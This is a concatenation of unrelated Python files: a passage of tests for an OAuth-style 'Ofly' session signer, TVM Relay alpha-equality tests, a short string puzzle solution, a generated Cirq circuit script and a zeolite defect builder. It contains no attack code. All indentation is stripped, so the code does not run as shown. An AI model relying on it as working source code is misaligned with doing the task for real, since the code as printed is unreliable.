signature_base_string = self.service.app_secret + url_path + '?'
if len(kwargs['params']):
signature_base_string += \
self.fake_get_sorted_params(kwargs['params']) + '&'
signature_base_string += self.fake_get_sorted_params(ofly_params)
all_params = dict(tuple(ofly_params.items())
+ tuple(kwargs['params'].items()))
kwargs['params'] = self.fake_get_sorted_params(all_params)
if not isinstance(kwargs['params'], bytes):
kwargs['params'] = kwargs['params'].encode('utf-8')
mock_request.assert_called_with(method,
url,
timeout=OFLY_DEFAULT_TIMEOUT,
**kwargs)
return r
def fake_get_session(self, token):
return self.session
def test_get_session(self):
s = self.service.get_session('foo')
self.assertIsInstance(s, OflySession)
@fake_sign(app_id, user_id)
def test_get_authorize_url(self, ofly_params):
expected_url = 'http://example.com/authorize?'
ofly_params.pop('oflyUserid')
params = self.fake_get_sorted_params(ofly_params)
url = self.service.get_authorize_url()
self.assertEqual(url, expected_url + params)
def test_request_with_md5(self):
r = self.session.request('GET',
'http://example.com/',
user_id=self.user_id,
hash_meth='md5')
self.assert_ok(r)
def test_request_with_bad_hash_meth(self):
with self.assertRaises(TypeError) as e:
self.session.request('GET',
'http://example.com/',
user_id=self.user_id,
hash_meth='foo')
self.assertEqual(str(e.exception),
'hash_meth must be one of "sha1", "md5"')
def test_get_auth_session(self):
s = self.service.get_auth_session('foo')
self.assertIsInstance(s, OflySession)
def test_pickle_session(self):
session = pickle.loads(pickle.dumps(self.session))
# Add the fake request back to the session
session.request = self.fake_request
r = self.session.request('GET',
'http://example.com/',
user_id=self.user_id,
hash_meth='md5')
self.assert_ok(r)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import tvm
from tvm import relay
from tvm.relay import analysis
from tvm.relay.testing import run_opt_pass
def alpha_equal(x, y):
"""
Wrapper around alpha equality which ensures that
the hash function respects equality.
"""
return analysis.alpha_equal(x, y) and analysis.structural_hash(x) == analysis.structural_hash(y)
def test_tensor_type_alpha_equal():
t1 = relay.TensorType((3, 4), "float32")
t2 = relay.TensorType((3, 4), "float32")
t3 = relay.TensorType((3, 4, 5), "float32")
assert t1 == t2
assert t1 != t3
t1 = relay.TensorType((), "float32")
t2 = relay.TensorType((), "float32")
assert t1 == t2
def test_incomplete_type_alpha_equal():
t1 = relay.IncompleteType(relay.TypeKind.ShapeVar)
t2 = relay.IncompleteType(relay.TypeKind.Type)
t3 = relay.IncompleteType(relay.TypeKind.Type)
# only equal when there is pointer equality
assert t2 == t2
assert t1 == t1
assert t1 != t2
assert t2 != t3
def test_type_param_alpha_equal():
t1 = relay.TypeVar("v1", relay.TypeKind.Type)
t2 = relay.TypeVar("v2", relay.TypeKind.ShapeVar)
t3 = relay.TypeVar("v3", relay.TypeKind.Type)
# only pointer equality and eq_map allow equal params
assert t1 == t1
assert t2 == t2
assert t1 != t2 # different kind
assert t1 != t3 # not in eq_map
# function types are the only way to put type params
# in eq map
ft1 = relay.FuncType(tvm.convert([]), t1, tvm.convert([t1]), tvm.convert([]))
ft2 = relay.FuncType(tvm.convert([]), t3, tvm.convert([t3]), tvm.convert([]))
# actually an invalid type because t2 is wrong kind
ft3 = relay.FuncType(tvm.convert([]), t2, tvm.convert([t2]), tvm.convert([]))
assert ft1 == ft2
assert ft1 != ft3 # kinds still do not match
def test_func_type_alpha_equal():
t1 = relay.TensorType((1, 2), "float32")
t2 = relay.TensorType((1, 2, 3), "float32")
tp1 = relay.TypeVar("v1", relay.TypeKind.Type)
tp2 = relay.TypeVar("v2", relay.TypeKind.Type)
tp3 = relay.TypeVar("v3", relay.TypeKind.ShapeVar)
tp4 = relay.TypeVar("v3", relay.TypeKind.ShapeVar)
broadcast = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Broadcast")
identity = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Identity")
tr1 = relay.TypeRelation(broadcast, tvm.convert([tp1, tp3]), 1, None)
tr2 = relay.TypeRelation(broadcast, tvm.convert([tp2, tp4]), 1, None)
tr3 = relay.TypeRelation(identity, tvm.convert([tp1, tp3]), 1, None)
ft = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1]))
translate_vars = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp2, tp4]),
tvm.convert([tr2]))
assert ft == translate_vars
different_args = relay.FuncType(tvm.convert([t1]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1]))
assert ft != different_args
different_order = relay.FuncType(tvm.convert([t2, t1]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1]))
assert ft != different_order
no_rel = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([]))
assert ft != no_rel
more_vars = relay.FuncType(tvm.convert([t1, t2]), tp2,
tvm.convert([tp1, tp2, tp3]),
tvm.convert([tr1]))
assert ft != more_vars
all_the_vars = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp2, tp3, tp4]),
tvm.convert([tr1, tr2]))
assert ft != all_the_vars
different_rel = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr3]))
assert ft != different_rel
more_rels = relay.FuncType(tvm.convert([t1, t2]), tp1,
tvm.convert([tp1, tp3]),
tvm.convert([tr1, tr3]))
assert ft != more_rels
def test_tuple_type_alpha_equal():
t1 = relay.TensorType((1, 2, 3), "float32")
t2 = relay.TensorType((1, 2, 3, 4), "float32")
tp1 = relay.TypeVar("v1", relay.TypeKind.Type)
tp2 = relay.TypeVar("v2", relay.TypeKind.Type)
tup1 = relay.TupleType(tvm.convert([t1, t2, tp1]))
tup2 = relay.TupleType(tvm.convert([t1, t2, tp1]))
tup3 = relay.TupleType(tvm.convert([t2, t1, tp1]))
tup4 = relay.TupleType(tvm.convert([t1, t2, tp2]))
# as long as types are alpha-equal and in same order,
# tuples should be alpha-equal
assert tup1 == tup2
assert tup1 != tup3
assert tup1 != tup4
def test_type_relation_alpha_equal():
t1 = relay.TensorType((1, 2), "float32")
t2 = relay.TensorType((1, 2, 3), "float32")
t3 = relay.TensorType((1, 2, 3, 4), "float32")
# functions are compared only by pointer equality so
# we need to be sure to use the same pointers
broadcast = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Broadcast")
identity = tvm.ir.EnvFunc.get("tvm.relay.type_relation.Identity")
attr1 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr1_same = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr2 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4,4))
tr = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr1)
same = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr1)
diff_func = relay.TypeRelation(identity, tvm.convert([t1, t2]), 1, attr1)
diff_order = relay.TypeRelation(broadcast, tvm.convert([t2, t1]), 1, attr1)
diff_args = relay.TypeRelation(broadcast, tvm.convert([t2, t3]), 1, attr1)
diff_attr = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr2)
same_attr = relay.TypeRelation(broadcast, tvm.convert([t1, t2]), 1, attr1_same)
bigger = relay.TypeRelation(identity, tvm.convert([t1, t3, t2]), 2, attr1)
diff_num_inputs = relay.TypeRelation(identity, tvm.convert([t1, t3, t2]), 1, attr2)
# func, number of args, input count, and order should be the same
assert tr == same
assert tr != diff_func
assert tr != diff_order
assert tr != diff_args
assert tr != diff_attr
assert tr == same_attr
assert tr != bigger
assert bigger != diff_num_inputs
def test_type_call_alpha_equal():
h1 = relay.GlobalTypeVar("h1")
h2 = relay.GlobalTypeVar("h2")
t1 = relay.TensorType((1, 2), "float32")
t2 = relay.TensorType((1, 2, 3), "float32")
t3 = relay.TensorType((1, 2, 3, 4), "float32")
t4 = relay.TensorType((), "float32")
tc = relay.TypeCall(h1, [t1, t2, t3])
same = relay.TypeCall(h1, [t1, t2, t3])
different_func = relay.TypeCall(h2, [t1, t2, t3])
different_arg = relay.TypeCall(h1, [t1, t2, t4])
fewer_args = relay.TypeCall(h1, [t1, t2])
more_args = relay.TypeCall(h1, [t1, t2, t3, t4])
different_order_args = relay.TypeCall(h1, [t3, t2, t1])
assert tc == same
assert tc != different_func
assert tc != fewer_args
assert tc != more_args
assert tc != different_order_args
def test_constant_alpha_equal():
x = relay.const(1)
y = relay.const(2)
assert alpha_equal(x, x)
assert not alpha_equal(x, y)
assert alpha_equal(x, relay.const(1))
def test_var_alpha_equal():
v1 = relay.Var("v1")
v2 = relay.Var("v2")
# normally only pointer equality
assert alpha_equal(v1, v1)
assert not alpha_equal(v1, v2)
# let node allows for setting the eq_map
l1 = relay.Let(v1, relay.const(1), v1)
l2 = relay.Let(v2, relay.const(1), v2)
l3 = relay.Let(v1, relay.const(1), v2)
assert alpha_equal(l1, l2)
assert not alpha_equal(l1, l3)
# type annotations
tt1 = relay.TensorType([], "int32")
tt2 = relay.TensorType([], "int32")
tt3 = relay.TensorType([], "int64")
v3 = relay.Var("v3", tt1)
v4 = relay.Var("v4", tt2)
v5 = relay.Var("v5", tt3)
l4 = relay.Let(v3, relay.const(1), v3)
l5 = relay.Let(v4, relay.const(1), v4)
l6 = relay.Let(v5, relay.const(1), v5)
# same annotations
assert alpha_equal(l4, l5)
# different annotations
assert not alpha_equal(l4, l6)
# one null annotation
assert not alpha_equal(l1, l4)
def test_global_var_alpha_equal():
v1 = relay.GlobalVar("v1")
v2 = relay.GlobalVar("v2")
# only pointer equality suffices (smoke test)
assert alpha_equal(v1, v1)
assert not alpha_equal(v1, v2)
def test_tuple_alpha_equal():
v0 = relay.Var("v0")
v1 = relay.Var("v1")
v2 = relay.Var("v2")
# unit value is a valid tuple
assert alpha_equal(relay.Tuple([]), relay.Tuple([]))
tup = relay.Tuple([v0, relay.const(2), relay.const(3), relay.Tuple([relay.const(4)])])
same = relay.Tuple([v0, relay.const(2), relay.const(3), relay.Tuple([relay.const(4)])])
assert alpha_equal(tup, same)
# use the eq_map
let_tup = relay.Let(v1, tup, v1)
let_mapped = relay.Let(v2, relay.Tuple([v0, relay.const(2), relay.const(3),
relay.Tuple([relay.const(4)])]),
v2)
assert alpha_equal(let_tup, let_mapped)
more_fields = relay.Tuple([v1, relay.const(2), relay.const(3), relay.Tuple([relay.const(4)]), v2])
assert not alpha_equal(tup, more_fields)
fewer_fields = relay.Tuple([v1, relay.const(2), relay.const(3)])
assert not alpha_equal(tup, fewer_fields)
different_end = relay.Tuple([v1, relay.const(2), relay.const(3),
relay.Tuple([relay.const(5)])])
assert not alpha_equal(tup, different_end)
different_start = relay.Tuple([v2, relay.const(2), relay.const(3),
relay.Tuple([relay.const(4)])])
assert not alpha_equal(tup, different_start)
longer_at_end = relay.Tuple([v1, relay.const(2), relay.const(3),
relay.Tuple([relay.const(4), relay.const(5)])])
assert not alpha_equal(tup, longer_at_end)
def test_tuple_get_item_alpha_equal():
x = relay.Var('x')
y = relay.Var('y')
assert not alpha_equal(relay.TupleGetItem(x, 1), relay.TupleGetItem(y, 1))
assert not alpha_equal(relay.TupleGetItem(x, 1), relay.TupleGetItem(x, 2))
assert alpha_equal(relay.TupleGetItem(x, 1), relay.TupleGetItem(x, 1))
def test_function_attr():
x0 = relay.var('x0', shape=(10, 10))
w00 = relay.var('w00', shape=(10, 10))
w01 = relay.var('w01', shape=(10, 10))
w02 = relay.var('w02', shape=(10, 10))
z00 = relay.add(x0, w00)
p00 = relay.subtract(z00, w01)
q00 = relay.multiply(p00, w02)
func0 = relay.Function([x0, w00, w01, w02], q00)
func0 = func0.set_attribute("FuncName", tvm.tir.StringImm("a"))
x1 = relay.var('x1', shape=(10, 10))
w10 = relay.var('w10', shape=(10, 10))
w11 = relay.var('w11', shape=(10, 10))
w12 = relay.var('w12', shape=(10, 10))
z10 = relay.add(x1, w10)
p10 = relay.subtract(z10, w11)
q10 = relay.multiply(p10, w12)
func1 = relay.Function([x1, w10, w11, w12], q10)
func1 = func1.set_attribute("FuncName", tvm.tir.StringImm("b"))
assert not alpha_equal(func0, func1)
def test_function_alpha_equal():
tt1 = relay.TensorType((1, 2, 3), "float32")
tt2 = relay.TensorType((4, 5, 6), "int8")
tt3 = relay.TupleType([tt1, tt2])
v1 = relay.Var("v1", tt1)
v2 = relay.Var("v2", tt2)
v3 = relay.Var("v3", tt3)
v4 = relay.Var("v4", tt2)
vret = relay.Constant(tvm.nd.array(np.ones(1)))
tp1 = relay.TypeVar("tp1", relay.TypeKind.Type)
tp2 = relay.TypeVar("tp2", relay.TypeKind.Type)
tp3 = relay.TypeVar("tp3", relay.TypeKind.ShapeVar)
tp4 = relay.TypeVar("tp4", relay.TypeKind.ShapeVar)
basic_args = [relay.Var("v3", tt1), relay.Var("v4", tt2)]
basic_tps = [tp1, tp2]
func = relay.Function([v1, v2], v1,
tt2, basic_tps)
mapped = relay.Function(basic_args, basic_args[0], tt2, basic_tps)
assert alpha_equal(func, mapped)
fewer_params = relay.Function([relay.Var("v4", tt2)], v4, tt2, basic_tps)
assert not alpha_equal(func, fewer_params)
more_params = relay.Function([relay.Var("v3", tt1),
relay.Var("v4", tt2),
relay.Var("v2", tt2)], v4, tt2, basic_tps)
assert not alpha_equal(func, more_params)
params_unordered = relay.Function([v2, v1], v1,
tt2, basic_tps)
assert not alpha_equal(func, params_unordered)
params_mismatch = relay.Function([v1, v3], v1,
tt2, basic_tps)
assert not alpha_equal(func, params_mismatch)
# also would not typecheck
ret_type_mismatch = relay.Function(basic_args, v4, tt1, basic_tps)
assert not alpha_equal(func, ret_type_mismatch)
# also mis-typed
different_body = relay.Function(basic_args, v3, tt2, basic_tps)
assert not alpha_equal(func, different_body)
fewer_type_params = relay.Function(basic_args, v4, tt2, [tp1])
assert not alpha_equal(func, fewer_type_params)
more_type_params = relay.Function(basic_args, v4, tt2, [tp1, tp2, tp3])
assert not alpha_equal(func, more_type_params)
type_params_unordered = relay.Function(basic_args, v4, tt2, [tp2, tp1])
assert not alpha_equal(func, type_params_unordered)
different_type_params = relay.Function(basic_args, v4, tt2, [tp3, tp4])
assert not alpha_equal(func, different_type_params)
# a well-typed example that also differs in body, ret type, and type params
tupled_example = relay.Function(basic_args, relay.Tuple([v3, v4]), tt3)
assert not alpha_equal(func, tupled_example)
# nullable
no_ret_type = relay.Function(basic_args, v4, None, [tp1, tp2])
# both null
assert alpha_equal(no_ret_type, no_ret_type)
# one null
assert not alpha_equal(func, no_ret_type)
assert not alpha_equal(no_ret_type, func)
def test_call_alpha_equal():
v1 = relay.Var("v1")
v2 = relay.Var("v2")
attr1 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr1_same = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr2 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4,4))
tt1 = relay.TensorType((1, 2, 3), "float32")
tt2 = relay.TensorType((), "int8")
basic_args = [relay.const(1), relay.const(2), v2, relay.Tuple([])]
# manually writing out args to ensure that args does not rely on
# pointer equality
call = relay.Call(v1, [relay.const(1), relay.const(2), v2, relay.Tuple([])],
attr1, [tt1])
same = relay.Call(v1, basic_args, attr1, [tt1])
assert alpha_equal(call, same)
different_fn = relay.Call(v2, basic_args, attr1, [tt1])
assert not alpha_equal(call, different_fn)
fewer_args = relay.Call(v1, [relay.const(1), relay.const(2), v2], attr1, [tt1])
assert not alpha_equal(call, fewer_args)
reordered_args = relay.Call(v1, [relay.const(2), relay.const(1),
relay.Tuple([]), v2], attr1, [tt1])
assert not alpha_equal(call, reordered_args)
different_args = relay.Call(v1, [relay.const(1), relay.const(2), relay.const(3)],
attr1, [tt1])
assert not alpha_equal(call, different_args)
more_args = relay.Call(v1, [relay.const(1), relay.const(2), v2, relay.Tuple([]),
relay.const(3), relay.const(4)], attr1, [tt1])
assert not alpha_equal(call, more_args)
different_attrs = relay.Call(v1, basic_args, attr2, [tt1])
assert not alpha_equal(call, different_attrs)
same_attrs = relay.Call(v1, basic_args, attr1_same, [tt1])
assert alpha_equal(call, same_attrs)
no_type_args = relay.Call(v1, basic_args, attr1)
assert not alpha_equal(call, no_type_args)
more_type_args = relay.Call(v1, basic_args, attr1, [tt1, tt2])
assert not alpha_equal(call, more_type_args)
different_type_arg = relay.Call(v1, basic_args, attr1, [tt2])
assert not alpha_equal(call, different_type_arg)
def test_let_alpha_equal():
tt1 = relay.TensorType((), "float32")
tt2 = relay.TensorType((), "int8")
v1 = relay.Var("v1")
v1_wtype = relay.Var("v1", tt1)
v2 = relay.Var("v2")
v3 = relay.Var("v3")
let = relay.Let(v1, relay.const(2), v1)
mapped = relay.Let(v2, relay.const(2), v2)
assert alpha_equal(let, mapped)
mismatched_var = relay.Let(v2, relay.const(2), v3)
assert not alpha_equal(let, mismatched_var)
different_value = relay.Let(v2, relay.const(3), v2)
assert not alpha_equal(let, different_value)
different_body = relay.Let(v2, relay.const(3), relay.const(12))
assert not alpha_equal(let, different_body)
# specified types must match
let_with_type = relay.Let(v1_wtype, relay.const(2), v1_wtype)
same_type = relay.Let(v1_wtype, relay.const(2), v1_wtype)
assert alpha_equal(let_with_type, same_type)
assert not alpha_equal(let, let_with_type)
v2 = relay.Var("v1", tt2)
different_type = relay.Let(v2, relay.const(2), v2)
assert not alpha_equal(let_with_type, different_type)
def test_if_alpha_equal():
v1 = relay.Var("v1")
v2 = relay.Var("v2")
if_sample = relay.If(v1, relay.const(1), relay.Tuple([relay.const(2), relay.const(3)]))
same = relay.If(v1, relay.const(1), relay.Tuple([relay.const(2), relay.const(3)]))
assert alpha_equal(if_sample, same)
different_cond = relay.If(v2, relay.const(1), relay.Tuple([relay.const(2), relay.const(3)]))
assert not alpha_equal(if_sample, different_cond)
different_true = relay.If(v1, relay.const(2), relay.Tuple([relay.const(2), relay.const(3)]))
assert not alpha_equal(if_sample, different_true)
different_false = relay.If(v1, relay.const(1), relay.Tuple([]))
assert not alpha_equal(if_sample, different_false)
def test_constructor_alpha_equal():
# smoke test: it should be pointer equality
mod = tvm.IRModule()
p = relay.prelude.Prelude(mod)
assert alpha_equal(p.nil, p.nil)
assert alpha_equal(p.cons, p.cons)
assert not alpha_equal(p.nil, p.cons)
def test_match_alpha_equal():
mod = tvm.IRModule()
p = relay.prelude.Prelude(mod)
x = relay.Var('x')
y = relay.Var('y')
nil_case = relay.Clause(relay.PatternConstructor(p.nil), p.nil())
cons_case = relay.Clause(relay.PatternConstructor(p.cons,
[relay.PatternVar(x),
relay.PatternVar(y)]),
p.cons(x, y))
z = relay.Var('z')
a = relay.Var('a')
equivalent_cons = relay.Clause(relay.PatternConstructor(p.cons,
[relay.PatternVar(z),
relay.PatternVar(a)]),
p.cons(z, a))
data = p.cons(relay.const(1), p.cons(relay.const(2), p.nil()))
match = relay.Match(data, [nil_case, cons_case])
equivalent = relay.Match(data, [nil_case, equivalent_cons])
empty = relay.Match(data, [])
no_cons = relay.Match(data, [nil_case])
no_nil = relay.Match(data, [cons_case])
different_data = relay.Match(p.nil(), [nil_case, cons_case])
different_order = relay.Match(data, [cons_case, nil_case])
different_nil = relay.Match(data, [
relay.Clause(relay.PatternConstructor(p.nil), p.cons(p.nil(), p.nil())),
cons_case
])
different_cons = relay.Match(data, [
nil_case,
relay.Clause(relay.PatternConstructor(p.cons,
[relay.PatternWildcard(),
relay.PatternWildcard()]),
p.nil())
])
another_case = relay.Match(data, [
nil_case,
cons_case,
relay.Clause(relay.PatternWildcard(), p.nil())
])
wrong_constructors = relay.Match(data, [
relay.Clause(relay.PatternConstructor(p.none), p.nil()),
relay.Clause(relay.PatternConstructor(p.some, [relay.PatternVar(x)]),
p.cons(x, p.nil()))
])
assert alpha_equal(match, match)
assert alpha_equal(match, equivalent)
assert not alpha_equal(match, no_cons)
assert not alpha_equal(match, no_nil)
assert not alpha_equal(match, empty)
assert not alpha_equal(match, different_data)
assert not alpha_equal(match, different_order)
assert not alpha_equal(match, different_nil)
assert not alpha_equal(match, different_cons)
assert not alpha_equal(match, another_case)
assert not alpha_equal(match, wrong_constructors)
def test_op_alpha_equal():
# only checks names
op1 = relay.op.get("add")
op2 = relay.op.get("add")
assert alpha_equal(op1, op2)
op3 = relay.op.get("take")
assert not alpha_equal(op1, op3)
def test_graph_equal():
x = relay.var("x")
y0 = relay.add(x, x)
z0 = relay.add(y0, y0)
y1 = relay.add(x, x)
z1 = relay.add(y1, y1)
z3 = relay.add(relay.add(x, x), relay.add(x, x))
assert alpha_equal(z0, z1)
assert alpha_equal(z0, z1)
# z3's dataflow format is different from z0
# z0 is computed from a common y0 node
# Relay view them as different programs
# Check the difference in the text format.
assert not alpha_equal(z0, z3)
def test_hash_unequal():
x1 = relay.var("x1", shape=(10, 10), dtype="float32")
y1 = relay.var("y1", shape=(10, 10), dtype="float32")
func1 = relay.Function([x1, y1], relay.add(x1, y1))
# func2 is exactly same structure with same variables shapes and dtypes
x2 = relay.var("x2", shape=(10, 10), dtype="float32")
y2 = relay.var("y2", shape=(10, 10), dtype="float32")
func2 = relay.Function([x2, y2], relay.add(x2, y2))
assert analysis.structural_hash(func1) == analysis.structural_hash(func2)
# func3 is same as func1 but with different var shapes
x3 = relay.var("x3", shape=(20, 10), dtype="float32")
y3 = relay.var("y3", shape=(20, 10), dtype="float32")
func3 = relay.Function([x3, y3], relay.add(x3, y3))
assert not analysis.structural_hash(func1) == analysis.structural_hash(func3)
def test_tuple_match():
a = relay.Var("a")
b = relay.Var("b")
clause = relay.Clause(relay.PatternTuple([relay.PatternVar(a), relay.PatternVar(b)]), a + b)
x = relay.Match(relay.Tuple([relay.const(1), relay.const(1)]), [clause])
a = relay.Var("a")
b = relay.Var("b")
clause = relay.Clause(relay.PatternTuple([relay.PatternVar(a), relay.PatternVar(b)]), a + b)
y = relay.Match(relay.Tuple([relay.const(1), relay.const(1)]), [clause])
assert analysis.alpha_equal(x, y)
assert analysis.structural_hash(x) == analysis.structural_hash(y)
def test_fn_attribute():
# create function that performs add
a = relay.var('a', shape=(10, 10))
b = relay.var('b', shape=(10, 10))
add = relay.add(a, b)
add_fn = relay.Function([a, b], add)
add_fn = run_opt_pass(add_fn, relay.transform.InferType())
# create function that performs add with test attribute
c = relay.var('c', shape=(10, 10))
d = relay.var('d', shape=(10, 10))
add_1 = relay.add(c, d)
add_1_fn = relay.Function([c, d], add_1)
add_1_fn = add_1_fn.set_attribute("TestAttribute", tvm.tir.StringImm("test"))
add_1_fn = run_opt_pass(add_1_fn, relay.transform.InferType())
assert not relay.analysis.alpha_equal(add_1_fn, add_fn)
assert not relay.analysis.alpha_equal(add_fn, add_1_fn)
if __name__ == "__main__":
test_tensor_type_alpha_equal()
test_incomplete_type_alpha_equal()
test_constant_alpha_equal()
test_func_type_alpha_equal()
test_tuple_type_alpha_equal()
test_type_relation_alpha_equal()
test_type_call_alpha_equal()
test_constant_alpha_equal()
test_global_var_alpha_equal()
test_tuple_alpha_equal()
test_tuple_get_item_alpha_equal()
test_function_alpha_equal()
test_function_attr()
test_call_alpha_equal()
test_let_alpha_equal()
test_if_alpha_equal()
test_constructor_alpha_equal()
test_match_alpha_equal()
test_op_alpha_equal()
test_var_alpha_equal()
test_graph_equal()
test_hash_unequal()
test_fn_attribute()
|
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
s = read().rstrip().decode()
for check in range(len(s) - 2, -1, -2):
if s[check // 2:check] == s[:check // 2]:
print(check)
exit()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=74
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[2])) # number=38
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=39
c.append(cirq.H.on(input_qubit[2])) # number=40
c.append(cirq.H.on(input_qubit[2])) # number=59
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=60
c.append(cirq.H.on(input_qubit[2])) # number=61
c.append(cirq.H.on(input_qubit[2])) # number=42
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=43
c.append(cirq.H.on(input_qubit[2])) # number=44
c.append(cirq.H.on(input_qubit[2])) # number=48
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=49
c.append(cirq.H.on(input_qubit[2])) # number=50
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=54
c.append(cirq.X.on(input_qubit[2])) # number=55
c.append(cirq.H.on(input_qubit[2])) # number=67
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=68
c.append(cirq.H.on(input_qubit[2])) # number=69
c.append(cirq.H.on(input_qubit[2])) # number=64
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=65
c.append(cirq.H.on(input_qubit[2])) # number=66
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=37
c.append(cirq.H.on(input_qubit[2])) # number=51
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=52
c.append(cirq.H.on(input_qubit[2])) # number=53
c.append(cirq.H.on(input_qubit[2])) # number=25
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=26
c.append(cirq.H.on(input_qubit[2])) # number=27
c.append(cirq.H.on(input_qubit[1])) # number=7
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=8
c.append(cirq.rx(0.17592918860102857).on(input_qubit[2])) # number=34
c.append(cirq.rx(-0.3989822670059037).on(input_qubit[1])) # number=30
c.append(cirq.H.on(input_qubit[1])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=18
c.append(cirq.rx(2.3310617489636263).on(input_qubit[2])) # number=58
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=19
c.append(cirq.H.on(input_qubit[1])) # number=20
c.append(cirq.X.on(input_qubit[1])) # number=62
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.H.on(input_qubit[1])) # number=22
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=23
c.append(cirq.rx(-0.9173450548482197).on(input_qubit[1])) # number=57
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=63
c.append(cirq.H.on(input_qubit[1])) # number=24
c.append(cirq.Z.on(input_qubit[2])) # number=3
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=70
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=71
c.append(cirq.Z.on(input_qubit[1])) # number=72
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=73
c.append(cirq.X.on(input_qubit[1])) # number=17
c.append(cirq.Y.on(input_qubit[2])) # number=5
c.append(cirq.X.on(input_qubit[2])) # number=21
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=16
c.append(cirq.X.on(input_qubit[2])) # number=28
c.append(cirq.X.on(input_qubit[2])) # number=29
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq372.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
from ase.io import read, write
from ase import Atoms
from maze import Zeotype, OpenDefect, ImperfectZeotype
import os
from ase.visualize import view
from pathlib import Path
from collections import defaultdict
from typing import List
import numpy as np
# %%
def defect_maker(cif_dir, zeolite_code, output_dir, savefiles=True):
zeolite = Zeotype.build_from_cif_with_labels(cif_dir)
open_defect = OpenDefect(zeolite)
unique_t_site_indices = {}
for site_name, value in zeolite._site_to_atom_indices.items():
if 'T' in site_name:
unique_t_site_indices[site_name] = value[1]
# build dictionary of open defects
unique_t_site_to_od = defaultdict(list)
for site_name, t_site in unique_t_site_indices.items():
for o_index in open_defect.neighbor_list.get_neighbors(t_site)[0]:
for si_index in open_defect.neighbor_list.get_neighbors(o_index)[0]:
if si_index == t_site:
continue
pos = open_defect.get_positions()[si_index]
new_od = open_defect.delete_atoms([si_index]).cap_atoms()
unique_t_site_to_od[site_name].append(new_od)
# save T sites
if savefiles: #I made this change
for site_name, od_list in unique_t_site_to_od.items():
output_dir2 = os.path.join(output_dir, zeolite_code, site_name)
Path(output_dir2).mkdir(parents=True, exist_ok=True)
for index, od in enumerate(od_list):
output_filename = zeolite_code + '_' + site_name + '_' + str(index) + '.traj'
my_path = os.path.join(output_dir2, output_filename)
write(my_path, od)
return unique_t_site_to_od # and most importantly I made this chnage
